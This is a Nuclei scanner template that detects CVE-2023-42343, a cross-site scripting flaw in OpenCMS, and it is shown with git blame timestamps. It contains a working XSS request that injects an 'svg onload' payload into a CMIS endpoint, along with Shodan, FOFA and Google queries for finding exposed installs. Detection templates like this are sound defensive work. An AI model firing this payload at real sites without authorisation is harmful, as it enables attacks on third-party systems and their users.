nuclei-templates/http/cves/2023/CVE-2023-42343.yaml

42 lines
1.2 KiB
YAML
Raw Normal View History

2023-12-27 08:52:44 +00:00
id: CVE-2023-42343
info:
name: OpenCMS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
remediation: Fixed in 10.5.1.
reference:
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
classification:
cve-id: CVE-2023-42343
metadata:
verified: true
2023-12-27 08:52:44 +00:00
max-request: 1
shodan-query:
- "/opencms/"
- http.title:"opencms"
- cpe:"cpe:2.3:a:alkacon:opencms"
product: opencms
vendor: alkacon
fofa-query: title="opencms"
google-query: intitle:"opencms"
2023-12-27 08:52:44 +00:00
tags: cve,cve2023,xss,opencms
http:
- method: GET
path:
- '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
headers:
Content-Type: application/cmisquery+xml
2023-12-27 10:10:57 +00:00
matchers-condition: and
2023-12-27 08:52:44 +00:00
matchers:
- type: word
2023-12-27 10:10:57 +00:00
part: body
2023-12-27 08:52:44 +00:00
words:
- 'Apache Chemistry OpenCMIS'
- '<svg onload=alert(document.domain)>'
2023-12-27 10:10:57 +00:00
condition: and
# digest: 4b0a00483046022100ec8cd697c46ef8ebf1f06b19f7a09d1bc6bfd5668d1c39e73eadd911b7ec813e0221008d5a832ae4403ba0ddc92701308747190c2df6d87eccc1551133709ef2ff3d8e:922c64590222798bb761d5b6d8e72950